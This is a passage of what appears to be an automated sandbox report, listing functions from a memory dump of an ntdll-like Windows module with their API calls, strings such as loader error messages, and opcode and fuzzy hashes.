API ID: StringUnicode$AppendBoundaryConvertCurrentDeleteDescriptorFormatFreeInformationInitializeLengthOpenPathQueryThunkTokenUser
String ID:
API String ID: 1101908438-0
Opcode ID: e0e76372dc9ee632bed58c3380919a4074bf06c5104ee50b5dec1d0f0d63f34e
Instruction ID: 30e68aff273aa272458cdef25867ec6f05d52e62f7643e1b6fba692c4d29ede0
Opcode Fuzzy Hash: e0e76372dc9ee632bed58c3380919a4074bf06c5104ee50b5dec1d0f0d63f34e
Instruction Fuzzy Hash: DB11F6B6C0021DABCF118F9AC8448EFFFB9EB88350F00416BE915A7240D7398A54CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 726733B4, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 307libraryCOMMON

Download Yara Rule

APIs

RtlRunOnceExecuteOnce.210A(727384DC,726871B0,00000000,00000000,00000000,?,?), ref: 726733E5
LdrResGetRCConfig.210A(00000000,00000000,726871B0,00001000,00000000,727384DC,726871B0,00000000,00000000,00000000,?,?), ref: 726B488E

Strings

Failed to retrieve service checksum., xrefs: 726B48D8
ResIdCount less than 2., xrefs: 726B4934

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Once$ConfigExecute
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 2941660791-863616075
Opcode ID: 32f9aae75c3e3afc5759448a7e40ff31bc315ef0589ccb08fc3a6cd4fca45c0c
Instruction ID: 47e4ea2c2b554b91639dc7de32961f5f228a86d2b19ffd18917be0db6f4a0e95
Opcode Fuzzy Hash: 32f9aae75c3e3afc5759448a7e40ff31bc315ef0589ccb08fc3a6cd4fca45c0c
Instruction Fuzzy Hash: B1D1E2B0A083819FD325CF1AD580B9BFBE5BBC8704F90892EE58997381DB719945CF46

Uniqueness

Uniqueness Score: -1.00%

Function 72647440, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(72736620), ref: 72647466
RtlLeaveCriticalSection.210A(72736620,72736620), ref: 726474C5

Strings

`, xrefs: 726A3516

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: `
API String ID: 3168844106-2679148245
Opcode ID: 9ff00292a524d13c023f9b58fa4c1f514f797196d5c61aaeb3157d199bf87627
Instruction ID: a6b527484c03972ec8b13b0dd122879789e852d9011944499522ebe36efe13fb
Opcode Fuzzy Hash: 9ff00292a524d13c023f9b58fa4c1f514f797196d5c61aaeb3157d199bf87627
Instruction Fuzzy Hash: DC21AD32B0070857E723816DCD02B7F7FAA5B80764F515127EAD79B2C0DE709A4182A5

Uniqueness

Uniqueness Score: -1.00%

Function 72657781, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76nativeCOMMON

Download Yara Rule

APIs

ZwProtectVirtualMemory.210A(000000FF,?,?,000000FE,?,?,?,?,?,?,7265D8C0,000014A6,?,72737B80), ref: 726577A5

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 726AA75E
LdrpDoPostSnapWork, xrefs: 726AA764
minkernel\ntdll\ldrsnap.c, xrefs: 726AA76E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2706961497-1948996284
Opcode ID: d2eb430bbbc2d7e18599878be871f3d67767f5e26e288853a60d677361c29717
Instruction ID: 9324deecb758e2cafb29e886a29f7d41a72630f2c02e3f7ece4d6b7f81fedde6
Opcode Fuzzy Hash: d2eb430bbbc2d7e18599878be871f3d67767f5e26e288853a60d677361c29717
Instruction Fuzzy Hash: EA110672700156AFD316DAAED880EA6BBBDFF04328750012BE9159B6C0E720FD12C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 726747FD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?,?,-00000001,?,?,?,726747BD,?,00000000,?,726A0991,00000000,00000000), ref: 72674871
memcpy.210A(00000000,?,?,?,00000000,?,?,-00000001,?,?,?,726747BD,?,00000000,?,726A0991), ref: 72674890

Strings

`fsr, xrefs: 7267489E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeapmemcpy
String ID: `fsr
API String ID: 1925790395-3961628072
Opcode ID: aab70f1a9035c2d6e3f1b07ff48fd297b00a4a66e8731426bff6c837330b2bdc
Instruction ID: 5a9425835220f4ac73f1aaea98da4deeca9959d0194d37f7a46a279863c565ab
Opcode Fuzzy Hash: aab70f1a9035c2d6e3f1b07ff48fd297b00a4a66e8731426bff6c837330b2bdc
Instruction Fuzzy Hash: 40214771A00684DFD725CF6CD980B66B7F9FB44240F50882EE5AEC7391DA70A850CB60

Uniqueness

Uniqueness Score: -1.00%

Function 7264A60B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,?,?,-00000001,?,726747ED,?,00000000,?,726A0991,00000000,00000000), ref: 726A5077

Strings

@fsr, xrefs: 726A50B5

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID: @fsr
API String ID: 1279760036-1276316310
Opcode ID: 8fab9d43798b53ba700a88daff8ec703ef52a5cc95e9e9f54b5e2c8240fbfdfd
Instruction ID: 137e703c1a534ac8dc85b5425126ba1fdd1e67355bcd9f3bd730d099a8d42bca
Opcode Fuzzy Hash: 8fab9d43798b53ba700a88daff8ec703ef52a5cc95e9e9f54b5e2c8240fbfdfd
Instruction Fuzzy Hash: E211C1375961C3EBC3268F1ACA41B213BB5FB88B56FB0082EE504DB692DB358C41C764

Uniqueness

Uniqueness Score: -1.00%

Function 726D11AC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwOpenEvent.210A(00000568,00100001,?,?,00000000), ref: 726D11F5
ZwWaitForSingleObject.210A(00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 726D1221
ZwClose.210A(00000568,00000568,00000000,?,00000568,00100001,?,?,00000000), ref: 726D122B

Strings

\KernelObjects\SystemErrorPortReady, xrefs: 726D11CB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseEventObjectOpenSingleWait
String ID: \KernelObjects\SystemErrorPortReady
API String ID: 2739627308-2278496901
Opcode ID: 915594333c5ba9a43b534721434f25e2152bfafb8e1c08a7d09acc97865da143
Instruction ID: 25c522101df45e4cb4d38d9cde4daf3ecfa98b7692f6bc1c0043e23024b953e5
Opcode Fuzzy Hash: 915594333c5ba9a43b534721434f25e2152bfafb8e1c08a7d09acc97865da143
Instruction Fuzzy Hash: C0112E71D1021CAACB10CFA99941AEEFBB8EF89310F10416BE954F3290E7754E458B99

Uniqueness

Uniqueness Score: -1.00%

Function 726442BE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51librarynativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,\DllNXOptions,?,?,00000000), ref: 726442E7

Part of subcall function 72680888: ZwOpenKey.210A(?,?,00000018), ref: 72680955

ZwClose.210A(?,?,?,?,\DllNXOptions,?,?,00000000), ref: 726A13FE
LdrQueryImageFileKeyOption.210A(?,?,00000004,?,00000004,?,?,?,00000000), ref: 726A1416

Strings

\DllNXOptions, xrefs: 726442DE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseFileImageInitOpenOptionQueryStringUnicode
String ID: \DllNXOptions
API String ID: 166309601-742623237
Opcode ID: 34aff945bf730ac00fd4ab8ca7288e90c6f8a6cde0b309a93bff151185dd9d19
Instruction ID: 8ff09b875370553c99719f25e0b2a266d39230d8acbf0237f22f9d5d7cfad3ce
Opcode Fuzzy Hash: 34aff945bf730ac00fd4ab8ca7288e90c6f8a6cde0b309a93bff151185dd9d19
Instruction Fuzzy Hash: C201F776A00119BBDB12DA9DDD00F8F7BBCDF45325F1000A7EA04E7281DA309E0187D4

Uniqueness

Uniqueness Score: -1.00%

Function 727012CA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,?,00000001), ref: 727012EA
RtlGetCurrentServiceSessionId.210A(?,?,00000001), ref: 7270130D
ZwTraceEvent.210A(?,00020402,00000010,?,?,?,00000001), ref: 7270133A

Strings

fsr, xrefs: 7270133F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID: fsr
API String ID: 4204234202-2000027029
Opcode ID: ad440d8084e8bde3e44898aa0d91d2bb5a00a7288c75d4b4acdd9ae4d3294c4e
Instruction ID: 07b561e51ea27ae5d49616146151de66ac8462e43dd0d31e810e004d1c8cacfe
Opcode Fuzzy Hash: ad440d8084e8bde3e44898aa0d91d2bb5a00a7288c75d4b4acdd9ae4d3294c4e
Instruction Fuzzy Hash: 4D01B571A01208ABCB14DFADD945EAEBBB8EF44710F00405BF900EB380EA74DE01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72701351, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,?,00000001), ref: 72701371
RtlGetCurrentServiceSessionId.210A(?,?,00000001), ref: 72701394
ZwTraceEvent.210A(?,00020402,00000010,?,?,?,00000001), ref: 727013C1

Strings

fsr, xrefs: 727013C6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID: fsr
API String ID: 4204234202-2000027029
Opcode ID: d3854c928b1411dc2a4158d831812ed32a0b4412199e9450631ad4c4e2c32d96
Instruction ID: 1a7ba4734fb6347b1d42f37c00b09530be4d80cf4e502abbe4d9afb0f67bd5cb
Opcode Fuzzy Hash: d3854c928b1411dc2a4158d831812ed32a0b4412199e9450631ad4c4e2c32d96
Instruction Fuzzy Hash: B8019E71A01208ABCB14DFADD945EAFBBB8EF44710F00406AF900EB380EA74DE01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72701151, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,0000002C,00000000, fsr,?,?,?,726BF4DD,?,00000000, fsr,00000000,7270568E,00000000,?), ref: 72701171
RtlGetCurrentServiceSessionId.210A(?,00000000, fsr,?,?,?,726BF4DD,?,00000000, fsr,00000000,7270568E,00000000,?,00000000), ref: 7270118E
ZwTraceEvent.210A(?,00020402,0000000C,?, fsr,?,?,?,726BF4DD,?,00000000, fsr,00000000,7270568E,00000000,?), ref: 727011BD

Strings

fsr, xrefs: 72701163

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID: fsr
API String ID: 4204234202-2000027029
Opcode ID: ed9ce3fda796c340d59ab1d9c7ae470b6468315345b43a4c29259704e2e7d06b
Instruction ID: 9f86983b8ea64a0e1a5defcb97415e1bae037e2b9cbc1f72b6ddb8afd43eadfb
Opcode Fuzzy Hash: ed9ce3fda796c340d59ab1d9c7ae470b6468315345b43a4c29259704e2e7d06b
Instruction Fuzzy Hash: 4F017171A11218ABD714DBA9D945EAEBBB8EF84700F50406AF901EB280EA749D01C798

Uniqueness

Uniqueness Score: -1.00%

Function 726C825D, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

ZwRaiseHardError.210A(C0000145,00000001,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000), ref: 726C82CF

Strings

Process initialization failed with status 0x%08lx, xrefs: 726C8272
LdrpInitializationFailure, xrefs: 726C8279
minkernel\ntdll\ldrinit.c, xrefs: 726C8283

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ErrorHardRaise
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 435474256-2986994758
Opcode ID: f26b680874f7d336da4b16c84d4be54d352243c46ffb9bb58d8d5476afb1870a
Instruction ID: 2b52c8cd9697d9fa1e2be2efaabf143b6690db9553387191158c319cfb5c08d1
Opcode Fuzzy Hash: f26b680874f7d336da4b16c84d4be54d352243c46ffb9bb58d8d5476afb1870a
Instruction Fuzzy Hash: 68F02832641349AFE221EA4CCD89FA63BA8DB44B05F600047FA44AB6C1C6B0B940CAC5

Uniqueness

Uniqueness Score: -1.00%

Function 7266C3BD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15nativeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(72737B60,00000000,7264FBAF,?,00000000,00000000,?,?,?,726A055C,?), ref: 7266C3D6
RtlLeaveCriticalSection.210A(72737B60,72737B60,00000000,7264FBAF,?,00000000,00000000,?,?,?,726A055C,?), ref: 7266C3E3

Part of subcall function 7265DB60: RtlpNotOwnerCriticalSection.210A(?,?,?), ref: 7265DB97

ZwSetEvent.210A(00000000,72737B60,72737B60,00000000,7264FBAF,?,00000000,00000000,?,?,?,726A055C,?), ref: 7266C3F0

Strings

`{sr, xrefs: 7266C3C9

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveOwnerRtlp
String ID: `{sr
API String ID: 2565325614-4175402379
Opcode ID: 8a96deeb4bbc4d8535d5aa28cf3e03322a0e1bdd9caebb693ca38874184876d6
Instruction ID: e7cd0b7edda93de03115135ad0b12a78071d2efb6e1785014a5c180cc8b7bdcc
Opcode Fuzzy Hash: 8a96deeb4bbc4d8535d5aa28cf3e03322a0e1bdd9caebb693ca38874184876d6
Instruction Fuzzy Hash: 71D0A733B416AAA6D721571EED50FD436A5AF02331F310875EA002B5C34A38A881529C

Uniqueness

Uniqueness Score: -1.00%

Function 726577ED, Relevance: 6.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

APIs

memcmp.210A(?,72621114,00000010,?,00000000,00000000,?,7265D8C0,000014A6,?), ref: 72657895
RtlAcquireSRWLockExclusive.210A(727386CC,?,00000000,00000000,?,7265D8C0,000014A6,?), ref: 726578EE
RtlReleaseSRWLockExclusive.210A(727386CC,727386CC,?,00000000,00000000,?,7265D8C0,000014A6,?), ref: 72657920
RtlAcquireSRWLockExclusive.210A(727386CC,?,00000000,00000000,?,7265D8C0,000014A6,?), ref: 726AA7AB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Releasememcmp
String ID:
API String ID: 2792186644-0
Opcode ID: 6097939a55b3878cd9eb83b9870449febd87593c9b1060aca45b461b2dc439a0
Instruction ID: 87598c3ee41905c842a53f870f4fece0ee9646fda87d5b98087691f3ce9c559d
Opcode Fuzzy Hash: 6097939a55b3878cd9eb83b9870449febd87593c9b1060aca45b461b2dc439a0
Instruction Fuzzy Hash: BD51B071A00206DBDB0ACF5EC5906BA77B2FF48315F5445ABD846AB2D5E730EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72658457, Relevance: 6.2, APIs: 4, Instructions: 161nativeCOMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.210A(00000003,?,00000000,00000000,?,00000000,00000000,?,?,?,00000000,?), ref: 72658484
ZwWow64IsProcessorFeaturePresent.210A(0000001C,00000003), ref: 7265852A
RtlAcquireSRWLockExclusive.210A(727384D8,00000003), ref: 726585DC
RtlReleaseSRWLockExclusive.210A(727384D8,727384D8,00000003), ref: 72658603

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireFeatureHeaderImagePresentProcessorReleaseWow64
String ID:
API String ID: 186005983-0
Opcode ID: aed755986c1a22ebf37d5910d3788fadbf4c1181d72ea17e48025b66831811d9
Instruction ID: ed049ed0fe1714c0c9f80f26a907e58be1f9e6bdec65ca1e62b9bfd6e3774339
Opcode Fuzzy Hash: aed755986c1a22ebf37d5910d3788fadbf4c1181d72ea17e48025b66831811d9
Instruction Fuzzy Hash: D451AF712043018BE715CE1AC591B2BB7E6FB84B44F20491EE6878BAC1DB70E989CB95

Uniqueness

Uniqueness Score: -1.00%

Function 72717030, Relevance: 6.1, APIs: 4, Instructions: 138filenativeCOMMON

Download Yara Rule

APIs

RtlCompressBuffer.210A(00000003,00000048,?,?,?,00000000,00000000,?,00000000,00000048,00000001,00000000,00000000,00000000,?,?), ref: 7271708D
memcpy.210A(?,00000000,?,00000003,00000048,?,?,?,00000000,00000000,?,00000000,00000048,00000001,00000000,00000000), ref: 727170B4
ZwWriteFile.210A(?,00000000,00000000,00000000,00000000,?,?,00000140,00000000,00000003,00000048,?,?,?,00000000,00000000), ref: 7271713E
memcpy.210A(?,?,?,?,00000000,00000000,00000000,00000000,?,?,00000140,00000000,00000003,00000048,?,?), ref: 727171BE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memcpy$BufferCompressFileWrite
String ID:
API String ID: 3594841428-0
Opcode ID: a2fee0d59e7b9b2f6a3e2cc8cb6df75fd0b2e9d403922bc5d07b681968ba349a
Instruction ID: 59674359d3552445d89f82b29a1b8db6ff6eba0a1156f4c3e6c7efd237299f54
Opcode Fuzzy Hash: a2fee0d59e7b9b2f6a3e2cc8cb6df75fd0b2e9d403922bc5d07b681968ba349a
Instruction Fuzzy Hash: B651F1716012059FDB16CF69C980BEA77B6EF88314F1880B9ED0D8F25ADB30A951DB60

Uniqueness

Uniqueness Score: -1.00%

Function 72642440, Relevance: 6.1, APIs: 4, Instructions: 105timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,?,?,?,?,?,?,7271ED68,00000024), ref: 726424AD
TpTimerOutstandingCallbackCount.210A(?,?,?,?,?,?,?,?,7271ED68,00000024), ref: 72642518
TpReleaseTimer.210A(?,?,?,?,?,?,?,?,?,7271ED68,00000024), ref: 72642528

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Timer$AcquireCallbackCountExclusiveLockOutstandingRelease
String ID:
API String ID: 3026781859-0
Opcode ID: 831f209dd628397ec3ae2096bea199095921faa78453b342afdead05beffcae6
Instruction ID: 1e0028d772b120acd679daeb662981e3c5e0286549a435c78c9f560fd969d5fe
Opcode Fuzzy Hash: 831f209dd628397ec3ae2096bea199095921faa78453b342afdead05beffcae6
Instruction Fuzzy Hash: 83416D71E006059FCB15CF6DC990A9DBBF2FF88324B21966BD496A72E0DB349A01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 7264B010, Relevance: 6.1, APIs: 4, Instructions: 97timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?), ref: 7264B030
RtlReleaseSRWLockExclusive.210A(?,?), ref: 7264B067
RtlDebugPrintTimes.210A(?,?,?,?,?,?), ref: 7264B0B4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireDebugPrintReleaseTimes
String ID:
API String ID: 4133708849-0
Opcode ID: 6510a763dd50637145e07e50bfa1c79ff38b7d7f78e0a2279372c9a7f4992f2f
Instruction ID: fc5e2f4aa06110a59d8b3acf2487ca6d74a8b629cd357173967477b2d6df5fd3
Opcode Fuzzy Hash: 6510a763dd50637145e07e50bfa1c79ff38b7d7f78e0a2279372c9a7f4992f2f
Instruction Fuzzy Hash: 2631B372A00244DFC712DF6CD880A56BBF9FF48710F20456BE9A58B281DB71EA01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 7264E328, Relevance: 6.1, APIs: 4, Instructions: 95memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,?,00000000,?,00000001), ref: 7264E36B
ZwQueryValueKey.210A(?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E38A
memcpy.210A(00000000,0000000C,?,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E3BB
RtlFreeHeap.210A(?,00000000,00000000,?,?,00000002,00000000,?,00000000,?,00000008,?,00000000,?,00000001), ref: 7264E3DB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy
String ID:
API String ID: 125101864-0
Opcode ID: 41a8056add7bda09d84b0e048a1790ecd0e4689e8167206683fb620b79666711
Instruction ID: 4f1e7c45c55b37e8cffa447effca3939b2e4e1db1cb921b388190e0108862bd8
